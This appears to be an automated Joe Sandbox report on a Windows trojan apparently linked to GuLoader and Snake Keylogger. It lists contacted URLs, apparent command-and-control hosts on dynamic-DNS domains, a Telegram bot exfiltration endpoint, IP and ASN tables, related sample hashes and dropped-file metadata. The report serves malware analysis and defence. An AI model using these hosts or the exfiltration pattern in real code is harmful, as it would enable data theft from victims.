                                                                        https://reallyfreegeoip.org/xml/msiexec.exe, 0000000B.00000002.2131404066.0000000024ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.office.com/msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1516044337.00000000064D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.1203225720.0000022BB7060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.ver)svchost.exe, 00000004.00000002.2112447469.0000022BB7200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://ac.ecosia.org?q=msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://drive.usercontent.google.com/msiexec.exe, 0000000B.00000002.2116644708.0000000008D0F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1745191196.0000000008D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorbddTkmucZP.exe, 00000000.00000000.842811185.000000000040A000.00000008.00000001.01000000.00000003.sdmp, bddTkmucZP.exe, 00000000.00000002.928814969.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                    high
                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1512682110.0000000003578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://aborters.duckdns.org:8081msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000004.00000003.1203225720.0000022BB70B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/v20msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.office.com/4msiexec.exe, 0000000B.00000002.2131404066.0000000024C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://chrome.google.com/webstore?hl=en(msiexec.exe, 0000000B.00000002.2131404066.0000000024C0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anotherarmy.dns.army:8081msiexec.exe, 0000000B.00000002.2131404066.0000000024A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/chrome_newtabv20msiexec.exe, 0000000B.00000002.2133262938.0000000025DA2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1513466927.00000000055C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://reallyfreegeoip.orgmsiexec.exe, 0000000B.00000002.2131404066.0000000024B71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024B4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2131404066.0000000024ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.office.com/(msiexec.exe, 0000000B.00000002.2131404066.0000000024C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://gemini.google.com/app?q=msiexec.exe, 0000000B.00000002.2133262938.0000000025B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  149.154.167.220
                                                                                                                                  api.telegram.orgUnited Kingdom
                                                                                                                                  62041TELEGRAMRUfalse
                                                                                                                                  172.217.23.97
                                                                                                                                  drive.usercontent.google.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  216.58.206.78
                                                                                                                                  drive.google.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  158.101.44.242
                                                                                                                                  checkip.dyndns.comUnited States
                                                                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                                                                  104.21.80.1
                                                                                                                                  reallyfreegeoip.orgUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  IP
                                                                                                                                  127.0.0.1
                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                  Analysis ID:1634851
                                                                                                                                  Start date and time:2025-03-11 05:45:27 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 7m 23s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:14
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:bddTkmucZP.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:bf7d6c1e7c5dec1d0607af05b35ea434a0fce86d8ae05c3d3f1dba9039f000cb.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/34@6/6
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 33.3%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                  • Number of executed functions: 119
                                                                                                                                  • Number of non-executed functions: 36
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.60.203.209, 2.16.185.191, 4.245.163.56, 40.69.42.241, 52.149.20.212
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target msiexec.exe, PID 2700 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4124 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  TimeTypeDescription
                                                                                                                                  00:46:22API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                                  00:46:54API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                  00:47:53API Interceptor271x Sleep call for process: msiexec.exe modified
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  149.154.167.220ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                            ZV6c9EEXXN.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                              2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  q7gFxqPoKo.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    rKD3pFG8o6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      158.101.44.242ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      jmh61pt3ob.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      NXY5MhIAxx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      KZ8qkyy2AY.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      checkip.dyndns.comctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 132.226.247.73
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      reallyfreegeoip.orgctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.64.1
                                                                                                                                                      ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.48.1
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.48.1
                                                                                                                                                      oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      api.telegram.orgctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ZV6c9EEXXN.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      q7gFxqPoKo.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rKD3pFG8o6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      TELEGRAMRUctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ZV6c9EEXXN.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      q7gFxqPoKo.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rKD3pFG8o6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      CLOUDFLARENETUSctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.64.1
                                                                                                                                                      0xHPSESJcg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.64.1
                                                                                                                                                      ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      EEcYuuRdFy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.80.156
                                                                                                                                                      7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.48.1
                                                                                                                                                      nPqeSjgAQQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 104.26.13.205
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      xwQOb1f8T9.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 172.67.222.201
                                                                                                                                                      ORACLE-BMC-31898USctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      vkd6SXGk6Z.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      dZwh4PQRW5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Yl5gNdZgTd.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      oR7Y7ZxJLU.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      xWApJIM4Ma.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ectTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      nPqeSjgAQQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MwavxEO86u.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      FORTUNE ALLIANCE VSL's DESCRIPTION.pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ZV6c9EEXXN.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      2RPs4pieGu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MV RUN LONG VSL's DETAILS.pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e198ut9PyavmS.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      CJFrBUk47v.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      4DttVpYJtB.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      gphS0POyUN.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      ZRoD4yRJGi.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      q7gFxqPoKo.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      48lsFvalYI.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      q7gFxqPoKo.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 216.58.206.78
                                                                                                                                                      • 172.217.23.97
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dll7uUGimQipu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        TMRASkMVAy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                          4PYRGCo1Di.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                            rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                046s01900330081250b4057885818022025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  comprobante de pago56789076pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                    comprobante de pago56789076pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                      kdrajK1oD8.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                        NBKi8t8shT.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.7066955532087961
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqx:2JIB/wUKUKQncEmYRTwh0F
                                                                                                                                                                          MD5:E59B5B251DBE83C6EBE87D13CD852CDD
                                                                                                                                                                          SHA1:63D1374E745AEB4765ADF2053DD013F83E94DB46
                                                                                                                                                                          SHA-256:2DEA3A4FA03AE503F4A13E76FEA1D381F466FBCE3AF5171C45EE80D04C8B1838
                                                                                                                                                                          SHA-512:7211F8A7220F533C9D3AE7A150D86D81D46FB286D4777F8376A37A662EDE7519E4E4B42B6E7D4B6AD1CD05AFE6FB787D1368EBAF4309620EDDE7053B75E8C16F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x54bfe376, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.7899463371528173
